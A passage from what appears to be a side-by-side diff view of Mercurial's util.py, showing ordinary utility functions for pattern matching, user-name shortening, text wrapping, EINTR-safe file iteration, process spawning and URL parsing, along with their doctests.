2174 case insensitive regex matches
2186 case insensitive regex matches
2175 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2187 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2176 ('re', 'A.+b', [False, False, True])
2188 ('re', 'A.+b', [False, False, True])
2177
2189
2178 case insensitive literal matches
2190 case insensitive literal matches
2179 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2191 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2180 ('literal', 'ABCDEFG', [False, False, True])
2192 ('literal', 'ABCDEFG', [False, False, True])
2181 """
2193 """
2182 if pattern.startswith('re:'):
2194 if pattern.startswith('re:'):
2183 pattern = pattern[3:]
2195 pattern = pattern[3:]
2184 try:
2196 try:
2185 flags = 0
2197 flags = 0
2186 if not casesensitive:
2198 if not casesensitive:
2187 flags = remod.I
2199 flags = remod.I
2188 regex = remod.compile(pattern, flags)
2200 regex = remod.compile(pattern, flags)
2189 except remod.error as e:
2201 except remod.error as e:
2190 raise error.ParseError(_('invalid regular expression: %s')
2202 raise error.ParseError(_('invalid regular expression: %s')
2191 % e)
2203 % e)
2192 return 're', pattern, regex.search
2204 return 're', pattern, regex.search
2193 elif pattern.startswith('literal:'):
2205 elif pattern.startswith('literal:'):
2194 pattern = pattern[8:]
2206 pattern = pattern[8:]
2195
2207
2196 match = pattern.__eq__
2208 match = pattern.__eq__
2197
2209
2198 if not casesensitive:
2210 if not casesensitive:
2199 ipat = encoding.lower(pattern)
2211 ipat = encoding.lower(pattern)
2200 match = lambda s: ipat == encoding.lower(s)
2212 match = lambda s: ipat == encoding.lower(s)
2201 return 'literal', pattern, match
2213 return 'literal', pattern, match
2202
2214
2203 def shortuser(user):
2215 def shortuser(user):
2204 """Return a short representation of a user name or email address."""
2216 """Return a short representation of a user name or email address."""
2205 f = user.find('@')
2217 f = user.find('@')
2206 if f >= 0:
2218 if f >= 0:
2207 user = user[:f]
2219 user = user[:f]
2208 f = user.find('<')
2220 f = user.find('<')
2209 if f >= 0:
2221 if f >= 0:
2210 user = user[f + 1:]
2222 user = user[f + 1:]
2211 f = user.find(' ')
2223 f = user.find(' ')
2212 if f >= 0:
2224 if f >= 0:
2213 user = user[:f]
2225 user = user[:f]
2214 f = user.find('.')
2226 f = user.find('.')
2215 if f >= 0:
2227 if f >= 0:
2216 user = user[:f]
2228 user = user[:f]
2217 return user
2229 return user
2218
2230
2219 def emailuser(user):
2231 def emailuser(user):
2220 """Return the user portion of an email address."""
2232 """Return the user portion of an email address."""
2221 f = user.find('@')
2233 f = user.find('@')
2222 if f >= 0:
2234 if f >= 0:
2223 user = user[:f]
2235 user = user[:f]
2224 f = user.find('<')
2236 f = user.find('<')
2225 if f >= 0:
2237 if f >= 0:
2226 user = user[f + 1:]
2238 user = user[f + 1:]
2227 return user
2239 return user
2228
2240
2229 def email(author):
2241 def email(author):
2230 '''get email of author.'''
2242 '''get email of author.'''
2231 r = author.find('>')
2243 r = author.find('>')
2232 if r == -1:
2244 if r == -1:
2233 r = None
2245 r = None
2234 return author[author.find('<') + 1:r]
2246 return author[author.find('<') + 1:r]
2235
2247
2236 def ellipsis(text, maxlength=400):
2248 def ellipsis(text, maxlength=400):
2237 """Trim string to at most maxlength (default: 400) columns in display."""
2249 """Trim string to at most maxlength (default: 400) columns in display."""
2238 return encoding.trim(text, maxlength, ellipsis='...')
2250 return encoding.trim(text, maxlength, ellipsis='...')
2239
2251
2240 def unitcountfn(*unittable):
2252 def unitcountfn(*unittable):
2241 '''return a function that renders a readable count of some quantity'''
2253 '''return a function that renders a readable count of some quantity'''
2242
2254
2243 def go(count):
2255 def go(count):
2244 for multiplier, divisor, format in unittable:
2256 for multiplier, divisor, format in unittable:
2245 if abs(count) >= divisor * multiplier:
2257 if abs(count) >= divisor * multiplier:
2246 return format % (count / float(divisor))
2258 return format % (count / float(divisor))
2247 return unittable[-1][2] % count
2259 return unittable[-1][2] % count
2248
2260
2249 return go
2261 return go
2250
2262
2251 def processlinerange(fromline, toline):
2263 def processlinerange(fromline, toline):
2252 """Check that linerange <fromline>:<toline> makes sense and return a
2264 """Check that linerange <fromline>:<toline> makes sense and return a
2253 0-based range.
2265 0-based range.
2254
2266
2255 >>> processlinerange(10, 20)
2267 >>> processlinerange(10, 20)
2256 (9, 20)
2268 (9, 20)
2257 >>> processlinerange(2, 1)
2269 >>> processlinerange(2, 1)
2258 Traceback (most recent call last):
2270 Traceback (most recent call last):
2259 ...
2271 ...
2260 ParseError: line range must be positive
2272 ParseError: line range must be positive
2261 >>> processlinerange(0, 5)
2273 >>> processlinerange(0, 5)
2262 Traceback (most recent call last):
2274 Traceback (most recent call last):
2263 ...
2275 ...
2264 ParseError: fromline must be strictly positive
2276 ParseError: fromline must be strictly positive
2265 """
2277 """
2266 if toline - fromline < 0:
2278 if toline - fromline < 0:
2267 raise error.ParseError(_("line range must be positive"))
2279 raise error.ParseError(_("line range must be positive"))
2268 if fromline < 1:
2280 if fromline < 1:
2269 raise error.ParseError(_("fromline must be strictly positive"))
2281 raise error.ParseError(_("fromline must be strictly positive"))
2270 return fromline - 1, toline
2282 return fromline - 1, toline
2271
2283
2272 bytecount = unitcountfn(
2284 bytecount = unitcountfn(
2273 (100, 1 << 30, _('%.0f GB')),
2285 (100, 1 << 30, _('%.0f GB')),
2274 (10, 1 << 30, _('%.1f GB')),
2286 (10, 1 << 30, _('%.1f GB')),
2275 (1, 1 << 30, _('%.2f GB')),
2287 (1, 1 << 30, _('%.2f GB')),
2276 (100, 1 << 20, _('%.0f MB')),
2288 (100, 1 << 20, _('%.0f MB')),
2277 (10, 1 << 20, _('%.1f MB')),
2289 (10, 1 << 20, _('%.1f MB')),
2278 (1, 1 << 20, _('%.2f MB')),
2290 (1, 1 << 20, _('%.2f MB')),
2279 (100, 1 << 10, _('%.0f KB')),
2291 (100, 1 << 10, _('%.0f KB')),
2280 (10, 1 << 10, _('%.1f KB')),
2292 (10, 1 << 10, _('%.1f KB')),
2281 (1, 1 << 10, _('%.2f KB')),
2293 (1, 1 << 10, _('%.2f KB')),
2282 (1, 1, _('%.0f bytes')),
2294 (1, 1, _('%.0f bytes')),
2283 )
2295 )
2284
2296
2285 # Matches a single EOL which can either be a CRLF where repeated CR
2297 # Matches a single EOL which can either be a CRLF where repeated CR
2286 # are removed or a LF. We do not care about old Macintosh files, so a
2298 # are removed or a LF. We do not care about old Macintosh files, so a
2287 # stray CR is an error.
2299 # stray CR is an error.
2288 _eolre = remod.compile(br'\r*\n')
2300 _eolre = remod.compile(br'\r*\n')
2289
2301
2290 def tolf(s):
2302 def tolf(s):
2291 return _eolre.sub('\n', s)
2303 return _eolre.sub('\n', s)
2292
2304
2293 def tocrlf(s):
2305 def tocrlf(s):
2294 return _eolre.sub('\r\n', s)
2306 return _eolre.sub('\r\n', s)
2295
2307
2296 if pycompat.oslinesep == '\r\n':
2308 if pycompat.oslinesep == '\r\n':
2297 tonativeeol = tocrlf
2309 tonativeeol = tocrlf
2298 fromnativeeol = tolf
2310 fromnativeeol = tolf
2299 else:
2311 else:
2300 tonativeeol = pycompat.identity
2312 tonativeeol = pycompat.identity
2301 fromnativeeol = pycompat.identity
2313 fromnativeeol = pycompat.identity
2302
2314
2303 def escapestr(s):
2315 def escapestr(s):
2304 # call underlying function of s.encode('string_escape') directly for
2316 # call underlying function of s.encode('string_escape') directly for
2305 # Python 3 compatibility
2317 # Python 3 compatibility
2306 return codecs.escape_encode(s)[0]
2318 return codecs.escape_encode(s)[0]
2307
2319
2308 def unescapestr(s):
2320 def unescapestr(s):
2309 return codecs.escape_decode(s)[0]
2321 return codecs.escape_decode(s)[0]
2310
2322
2311 def forcebytestr(obj):
2323 def forcebytestr(obj):
2312 """Portably format an arbitrary object (e.g. exception) into a byte
2324 """Portably format an arbitrary object (e.g. exception) into a byte
2313 string."""
2325 string."""
2314 try:
2326 try:
2315 return pycompat.bytestr(obj)
2327 return pycompat.bytestr(obj)
2316 except UnicodeEncodeError:
2328 except UnicodeEncodeError:
2317 # non-ascii string, may be lossy
2329 # non-ascii string, may be lossy
2318 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2330 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2319
2331
2320 def uirepr(s):
2332 def uirepr(s):
2321 # Avoid double backslash in Windows path repr()
2333 # Avoid double backslash in Windows path repr()
2322 return repr(s).replace('\\\\', '\\')
2334 return repr(s).replace('\\\\', '\\')
2323
2335
2324 # delay import of textwrap
2336 # delay import of textwrap
2325 def MBTextWrapper(**kwargs):
2337 def MBTextWrapper(**kwargs):
2326 class tw(textwrap.TextWrapper):
2338 class tw(textwrap.TextWrapper):
2327 """
2339 """
2328 Extend TextWrapper for width-awareness.
2340 Extend TextWrapper for width-awareness.
2329
2341
2330 Neither number of 'bytes' in any encoding nor 'characters' is
2342 Neither number of 'bytes' in any encoding nor 'characters' is
2331 appropriate to calculate terminal columns for specified string.
2343 appropriate to calculate terminal columns for specified string.
2332
2344
2333 Original TextWrapper implementation uses built-in 'len()' directly,
2345 Original TextWrapper implementation uses built-in 'len()' directly,
2334 so overriding is needed to use width information of each characters.
2346 so overriding is needed to use width information of each characters.
2335
2347
2336 In addition, characters classified into 'ambiguous' width are
2348 In addition, characters classified into 'ambiguous' width are
2337 treated as wide in East Asian area, but as narrow in other.
2349 treated as wide in East Asian area, but as narrow in other.
2338
2350
2339 This requires use decision to determine width of such characters.
2351 This requires use decision to determine width of such characters.
2340 """
2352 """
2341 def _cutdown(self, ucstr, space_left):
2353 def _cutdown(self, ucstr, space_left):
2342 l = 0
2354 l = 0
2343 colwidth = encoding.ucolwidth
2355 colwidth = encoding.ucolwidth
2344 for i in xrange(len(ucstr)):
2356 for i in xrange(len(ucstr)):
2345 l += colwidth(ucstr[i])
2357 l += colwidth(ucstr[i])
2346 if space_left < l:
2358 if space_left < l:
2347 return (ucstr[:i], ucstr[i:])
2359 return (ucstr[:i], ucstr[i:])
2348 return ucstr, ''
2360 return ucstr, ''
2349
2361
2350 # overriding of base class
2362 # overriding of base class
2351 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2363 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2352 space_left = max(width - cur_len, 1)
2364 space_left = max(width - cur_len, 1)
2353
2365
2354 if self.break_long_words:
2366 if self.break_long_words:
2355 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2367 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2356 cur_line.append(cut)
2368 cur_line.append(cut)
2357 reversed_chunks[-1] = res
2369 reversed_chunks[-1] = res
2358 elif not cur_line:
2370 elif not cur_line:
2359 cur_line.append(reversed_chunks.pop())
2371 cur_line.append(reversed_chunks.pop())
2360
2372
2361 # this overriding code is imported from TextWrapper of Python 2.6
2373 # this overriding code is imported from TextWrapper of Python 2.6
2362 # to calculate columns of string by 'encoding.ucolwidth()'
2374 # to calculate columns of string by 'encoding.ucolwidth()'
2363 def _wrap_chunks(self, chunks):
2375 def _wrap_chunks(self, chunks):
2364 colwidth = encoding.ucolwidth
2376 colwidth = encoding.ucolwidth
2365
2377
2366 lines = []
2378 lines = []
2367 if self.width <= 0:
2379 if self.width <= 0:
2368 raise ValueError("invalid width %r (must be > 0)" % self.width)
2380 raise ValueError("invalid width %r (must be > 0)" % self.width)
2369
2381
2370 # Arrange in reverse order so items can be efficiently popped
2382 # Arrange in reverse order so items can be efficiently popped
2371 # from a stack of chucks.
2383 # from a stack of chucks.
2372 chunks.reverse()
2384 chunks.reverse()
2373
2385
2374 while chunks:
2386 while chunks:
2375
2387
2376 # Start the list of chunks that will make up the current line.
2388 # Start the list of chunks that will make up the current line.
2377 # cur_len is just the length of all the chunks in cur_line.
2389 # cur_len is just the length of all the chunks in cur_line.
2378 cur_line = []
2390 cur_line = []
2379 cur_len = 0
2391 cur_len = 0
2380
2392
2381 # Figure out which static string will prefix this line.
2393 # Figure out which static string will prefix this line.
2382 if lines:
2394 if lines:
2383 indent = self.subsequent_indent
2395 indent = self.subsequent_indent
2384 else:
2396 else:
2385 indent = self.initial_indent
2397 indent = self.initial_indent
2386
2398
2387 # Maximum width for this line.
2399 # Maximum width for this line.
2388 width = self.width - len(indent)
2400 width = self.width - len(indent)
2389
2401
2390 # First chunk on line is whitespace -- drop it, unless this
2402 # First chunk on line is whitespace -- drop it, unless this
2391 # is the very beginning of the text (i.e. no lines started yet).
2403 # is the very beginning of the text (i.e. no lines started yet).
2392 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2404 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2393 del chunks[-1]
2405 del chunks[-1]
2394
2406
2395 while chunks:
2407 while chunks:
2396 l = colwidth(chunks[-1])
2408 l = colwidth(chunks[-1])
2397
2409
2398 # Can at least squeeze this chunk onto the current line.
2410 # Can at least squeeze this chunk onto the current line.
2399 if cur_len + l <= width:
2411 if cur_len + l <= width:
2400 cur_line.append(chunks.pop())
2412 cur_line.append(chunks.pop())
2401 cur_len += l
2413 cur_len += l
2402
2414
2403 # Nope, this line is full.
2415 # Nope, this line is full.
2404 else:
2416 else:
2405 break
2417 break
2406
2418
2407 # The current line is full, and the next chunk is too big to
2419 # The current line is full, and the next chunk is too big to
2408 # fit on *any* line (not just this one).
2420 # fit on *any* line (not just this one).
2409 if chunks and colwidth(chunks[-1]) > width:
2421 if chunks and colwidth(chunks[-1]) > width:
2410 self._handle_long_word(chunks, cur_line, cur_len, width)
2422 self._handle_long_word(chunks, cur_line, cur_len, width)
2411
2423
2412 # If the last chunk on this line is all whitespace, drop it.
2424 # If the last chunk on this line is all whitespace, drop it.
2413 if (self.drop_whitespace and
2425 if (self.drop_whitespace and
2414 cur_line and cur_line[-1].strip() == r''):
2426 cur_line and cur_line[-1].strip() == r''):
2415 del cur_line[-1]
2427 del cur_line[-1]
2416
2428
2417 # Convert current line back to a string and store it in list
2429 # Convert current line back to a string and store it in list
2418 # of all lines (return value).
2430 # of all lines (return value).
2419 if cur_line:
2431 if cur_line:
2420 lines.append(indent + r''.join(cur_line))
2432 lines.append(indent + r''.join(cur_line))
2421
2433
2422 return lines
2434 return lines
2423
2435
2424 global MBTextWrapper
2436 global MBTextWrapper
2425 MBTextWrapper = tw
2437 MBTextWrapper = tw
2426 return tw(**kwargs)
2438 return tw(**kwargs)
2427
2439
2428 def wrap(line, width, initindent='', hangindent=''):
2440 def wrap(line, width, initindent='', hangindent=''):
2429 maxindent = max(len(hangindent), len(initindent))
2441 maxindent = max(len(hangindent), len(initindent))
2430 if width <= maxindent:
2442 if width <= maxindent:
2431 # adjust for weird terminal size
2443 # adjust for weird terminal size
2432 width = max(78, maxindent + 1)
2444 width = max(78, maxindent + 1)
2433 line = line.decode(pycompat.sysstr(encoding.encoding),
2445 line = line.decode(pycompat.sysstr(encoding.encoding),
2434 pycompat.sysstr(encoding.encodingmode))
2446 pycompat.sysstr(encoding.encodingmode))
2435 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2447 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2436 pycompat.sysstr(encoding.encodingmode))
2448 pycompat.sysstr(encoding.encodingmode))
2437 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2449 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2438 pycompat.sysstr(encoding.encodingmode))
2450 pycompat.sysstr(encoding.encodingmode))
2439 wrapper = MBTextWrapper(width=width,
2451 wrapper = MBTextWrapper(width=width,
2440 initial_indent=initindent,
2452 initial_indent=initindent,
2441 subsequent_indent=hangindent)
2453 subsequent_indent=hangindent)
2442 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2454 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2443
2455
2444 if (pyplatform.python_implementation() == 'CPython' and
2456 if (pyplatform.python_implementation() == 'CPython' and
2445 sys.version_info < (3, 0)):
2457 sys.version_info < (3, 0)):
2446 # There is an issue in CPython that some IO methods do not handle EINTR
2458 # There is an issue in CPython that some IO methods do not handle EINTR
2447 # correctly. The following table shows what CPython version (and functions)
2459 # correctly. The following table shows what CPython version (and functions)
2448 # are affected (buggy: has the EINTR bug, okay: otherwise):
2460 # are affected (buggy: has the EINTR bug, okay: otherwise):
2449 #
2461 #
2450 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2462 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2451 # --------------------------------------------------
2463 # --------------------------------------------------
2452 # fp.__iter__ | buggy | buggy | okay
2464 # fp.__iter__ | buggy | buggy | okay
2453 # fp.read* | buggy | okay [1] | okay
2465 # fp.read* | buggy | okay [1] | okay
2454 #
2466 #
2455 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2467 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2456 #
2468 #
2457 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2469 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2458 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2470 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2459 #
2471 #
2460 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2472 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2461 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2473 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2462 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2474 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2463 # fp.__iter__ but not other fp.read* methods.
2475 # fp.__iter__ but not other fp.read* methods.
2464 #
2476 #
2465 # On modern systems like Linux, the "read" syscall cannot be interrupted
2477 # On modern systems like Linux, the "read" syscall cannot be interrupted
2466 # when reading "fast" files like on-disk files. So the EINTR issue only
2478 # when reading "fast" files like on-disk files. So the EINTR issue only
2467 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2479 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2468 # files approximately as "fast" files and use the fast (unsafe) code path,
2480 # files approximately as "fast" files and use the fast (unsafe) code path,
2469 # to minimize the performance impact.
2481 # to minimize the performance impact.
2470 if sys.version_info >= (2, 7, 4):
2482 if sys.version_info >= (2, 7, 4):
2471 # fp.readline deals with EINTR correctly, use it as a workaround.
2483 # fp.readline deals with EINTR correctly, use it as a workaround.
2472 def _safeiterfile(fp):
2484 def _safeiterfile(fp):
2473 return iter(fp.readline, '')
2485 return iter(fp.readline, '')
2474 else:
2486 else:
2475 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2487 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2476 # note: this may block longer than necessary because of bufsize.
2488 # note: this may block longer than necessary because of bufsize.
2477 def _safeiterfile(fp, bufsize=4096):
2489 def _safeiterfile(fp, bufsize=4096):
2478 fd = fp.fileno()
2490 fd = fp.fileno()
2479 line = ''
2491 line = ''
2480 while True:
2492 while True:
2481 try:
2493 try:
2482 buf = os.read(fd, bufsize)
2494 buf = os.read(fd, bufsize)
2483 except OSError as ex:
2495 except OSError as ex:
2484 # os.read only raises EINTR before any data is read
2496 # os.read only raises EINTR before any data is read
2485 if ex.errno == errno.EINTR:
2497 if ex.errno == errno.EINTR:
2486 continue
2498 continue
2487 else:
2499 else:
2488 raise
2500 raise
2489 line += buf
2501 line += buf
2490 if '\n' in buf:
2502 if '\n' in buf:
2491 splitted = line.splitlines(True)
2503 splitted = line.splitlines(True)
2492 line = ''
2504 line = ''
2493 for l in splitted:
2505 for l in splitted:
2494 if l[-1] == '\n':
2506 if l[-1] == '\n':
2495 yield l
2507 yield l
2496 else:
2508 else:
2497 line = l
2509 line = l
2498 if not buf:
2510 if not buf:
2499 break
2511 break
2500 if line:
2512 if line:
2501 yield line
2513 yield line
2502
2514
2503 def iterfile(fp):
2515 def iterfile(fp):
2504 fastpath = True
2516 fastpath = True
2505 if type(fp) is file:
2517 if type(fp) is file:
2506 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2518 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2507 if fastpath:
2519 if fastpath:
2508 return fp
2520 return fp
2509 else:
2521 else:
2510 return _safeiterfile(fp)
2522 return _safeiterfile(fp)
2511 else:
2523 else:
2512 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2524 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2513 def iterfile(fp):
2525 def iterfile(fp):
2514 return fp
2526 return fp
2515
2527
2516 def iterlines(iterator):
2528 def iterlines(iterator):
2517 for chunk in iterator:
2529 for chunk in iterator:
2518 for line in chunk.splitlines():
2530 for line in chunk.splitlines():
2519 yield line
2531 yield line
2520
2532
2521 def expandpath(path):
2533 def expandpath(path):
2522 return os.path.expanduser(os.path.expandvars(path))
2534 return os.path.expanduser(os.path.expandvars(path))
2523
2535
2524 def hgcmd():
2536 def hgcmd():
2525 """Return the command used to execute current hg
2537 """Return the command used to execute current hg
2526
2538
2527 This is different from hgexecutable() because on Windows we want
2539 This is different from hgexecutable() because on Windows we want
2528 to avoid things opening new shell windows like batch files, so we
2540 to avoid things opening new shell windows like batch files, so we
2529 get either the python call or current executable.
2541 get either the python call or current executable.
2530 """
2542 """
2531 if mainfrozen():
2543 if mainfrozen():
2532 if getattr(sys, 'frozen', None) == 'macosx_app':
2544 if getattr(sys, 'frozen', None) == 'macosx_app':
2533 # Env variable set by py2app
2545 # Env variable set by py2app
2534 return [encoding.environ['EXECUTABLEPATH']]
2546 return [encoding.environ['EXECUTABLEPATH']]
2535 else:
2547 else:
2536 return [pycompat.sysexecutable]
2548 return [pycompat.sysexecutable]
2537 return gethgcmd()
2549 return gethgcmd()
2538
2550
2539 def rundetached(args, condfn):
2551 def rundetached(args, condfn):
2540 """Execute the argument list in a detached process.
2552 """Execute the argument list in a detached process.
2541
2553
2542 condfn is a callable which is called repeatedly and should return
2554 condfn is a callable which is called repeatedly and should return
2543 True once the child process is known to have started successfully.
2555 True once the child process is known to have started successfully.
2544 At this point, the child process PID is returned. If the child
2556 At this point, the child process PID is returned. If the child
2545 process fails to start or finishes before condfn() evaluates to
2557 process fails to start or finishes before condfn() evaluates to
2546 True, return -1.
2558 True, return -1.
2547 """
2559 """
2548 # Windows case is easier because the child process is either
2560 # Windows case is easier because the child process is either
2549 # successfully starting and validating the condition or exiting
2561 # successfully starting and validating the condition or exiting
2550 # on failure. We just poll on its PID. On Unix, if the child
2562 # on failure. We just poll on its PID. On Unix, if the child
2551 # process fails to start, it will be left in a zombie state until
2563 # process fails to start, it will be left in a zombie state until
2552 # the parent wait on it, which we cannot do since we expect a long
2564 # the parent wait on it, which we cannot do since we expect a long
2553 # running process on success. Instead we listen for SIGCHLD telling
2565 # running process on success. Instead we listen for SIGCHLD telling
2554 # us our child process terminated.
2566 # us our child process terminated.
2555 terminated = set()
2567 terminated = set()
2556 def handler(signum, frame):
2568 def handler(signum, frame):
2557 terminated.add(os.wait())
2569 terminated.add(os.wait())
2558 prevhandler = None
2570 prevhandler = None
2559 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2571 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2560 if SIGCHLD is not None:
2572 if SIGCHLD is not None:
2561 prevhandler = signal.signal(SIGCHLD, handler)
2573 prevhandler = signal.signal(SIGCHLD, handler)
2562 try:
2574 try:
2563 pid = spawndetached(args)
2575 pid = spawndetached(args)
2564 while not condfn():
2576 while not condfn():
2565 if ((pid in terminated or not testpid(pid))
2577 if ((pid in terminated or not testpid(pid))
2566 and not condfn()):
2578 and not condfn()):
2567 return -1
2579 return -1
2568 time.sleep(0.1)
2580 time.sleep(0.1)
2569 return pid
2581 return pid
2570 finally:
2582 finally:
2571 if prevhandler is not None:
2583 if prevhandler is not None:
2572 signal.signal(signal.SIGCHLD, prevhandler)
2584 signal.signal(signal.SIGCHLD, prevhandler)
2573
2585
2574 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2586 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2575 """Return the result of interpolating items in the mapping into string s.
2587 """Return the result of interpolating items in the mapping into string s.
2576
2588
2577 prefix is a single character string, or a two character string with
2589 prefix is a single character string, or a two character string with
2578 a backslash as the first character if the prefix needs to be escaped in
2590 a backslash as the first character if the prefix needs to be escaped in
2579 a regular expression.
2591 a regular expression.
2580
2592
2581 fn is an optional function that will be applied to the replacement text
2593 fn is an optional function that will be applied to the replacement text
2582 just before replacement.
2594 just before replacement.
2583
2595
2584 escape_prefix is an optional flag that allows using doubled prefix for
2596 escape_prefix is an optional flag that allows using doubled prefix for
2585 its escaping.
2597 its escaping.
2586 """
2598 """
2587 fn = fn or (lambda s: s)
2599 fn = fn or (lambda s: s)
2588 patterns = '|'.join(mapping.keys())
2600 patterns = '|'.join(mapping.keys())
2589 if escape_prefix:
2601 if escape_prefix:
2590 patterns += '|' + prefix
2602 patterns += '|' + prefix
2591 if len(prefix) > 1:
2603 if len(prefix) > 1:
2592 prefix_char = prefix[1:]
2604 prefix_char = prefix[1:]
2593 else:
2605 else:
2594 prefix_char = prefix
2606 prefix_char = prefix
2595 mapping[prefix_char] = prefix_char
2607 mapping[prefix_char] = prefix_char
2596 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2608 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2597 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2609 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2598
2610
2599 def getport(port):
2611 def getport(port):
2600 """Return the port for a given network service.
2612 """Return the port for a given network service.
2601
2613
2602 If port is an integer, it's returned as is. If it's a string, it's
2614 If port is an integer, it's returned as is. If it's a string, it's
2603 looked up using socket.getservbyname(). If there's no matching
2615 looked up using socket.getservbyname(). If there's no matching
2604 service, error.Abort is raised.
2616 service, error.Abort is raised.
2605 """
2617 """
2606 try:
2618 try:
2607 return int(port)
2619 return int(port)
2608 except ValueError:
2620 except ValueError:
2609 pass
2621 pass
2610
2622
2611 try:
2623 try:
2612 return socket.getservbyname(port)
2624 return socket.getservbyname(port)
2613 except socket.error:
2625 except socket.error:
2614 raise Abort(_("no port number associated with service '%s'") % port)
2626 raise Abort(_("no port number associated with service '%s'") % port)
2615
2627
2616 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2628 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2617 '0': False, 'no': False, 'false': False, 'off': False,
2629 '0': False, 'no': False, 'false': False, 'off': False,
2618 'never': False}
2630 'never': False}
2619
2631
2620 def parsebool(s):
2632 def parsebool(s):
2621 """Parse s into a boolean.
2633 """Parse s into a boolean.
2622
2634
2623 If s is not a valid boolean, returns None.
2635 If s is not a valid boolean, returns None.
2624 """
2636 """
2625 return _booleans.get(s.lower(), None)
2637 return _booleans.get(s.lower(), None)
2626
2638
2627 _hextochr = dict((a + b, chr(int(a + b, 16)))
2639 _hextochr = dict((a + b, chr(int(a + b, 16)))
2628 for a in string.hexdigits for b in string.hexdigits)
2640 for a in string.hexdigits for b in string.hexdigits)
2629
2641
2630 class url(object):
2642 class url(object):
2631 r"""Reliable URL parser.
2643 r"""Reliable URL parser.
2632
2644
2633 This parses URLs and provides attributes for the following
2645 This parses URLs and provides attributes for the following
2634 components:
2646 components:
2635
2647
2636 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2648 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2637
2649
2638 Missing components are set to None. The only exception is
2650 Missing components are set to None. The only exception is
2639 fragment, which is set to '' if present but empty.
2651 fragment, which is set to '' if present but empty.
2640
2652
2641 If parsefragment is False, fragment is included in query. If
2653 If parsefragment is False, fragment is included in query. If
2642 parsequery is False, query is included in path. If both are
2654 parsequery is False, query is included in path. If both are
2643 False, both fragment and query are included in path.
2655 False, both fragment and query are included in path.
2644
2656
2645 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2657 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2646
2658
2647 Note that for backward compatibility reasons, bundle URLs do not
2659 Note that for backward compatibility reasons, bundle URLs do not
2648 take host names. That means 'bundle://../' has a path of '../'.
2660 take host names. That means 'bundle://../' has a path of '../'.
2649
2661
2650 Examples:
2662 Examples:
2651
2663
2652 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2664 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2653 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2665 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2654 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2666 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2655 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2667 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2656 >>> url(b'file:///home/joe/repo')
2668 >>> url(b'file:///home/joe/repo')
2657 <url scheme: 'file', path: '/home/joe/repo'>
2669 <url scheme: 'file', path: '/home/joe/repo'>
2658 >>> url(b'file:///c:/temp/foo/')
2670 >>> url(b'file:///c:/temp/foo/')
2659 <url scheme: 'file', path: 'c:/temp/foo/'>
2671 <url scheme: 'file', path: 'c:/temp/foo/'>
2660 >>> url(b'bundle:foo')
2672 >>> url(b'bundle:foo')
2661 <url scheme: 'bundle', path: 'foo'>
2673 <url scheme: 'bundle', path: 'foo'>
2662 >>> url(b'bundle://../foo')
2674 >>> url(b'bundle://../foo')
2663 <url scheme: 'bundle', path: '../foo'>
2675 <url scheme: 'bundle', path: '../foo'>
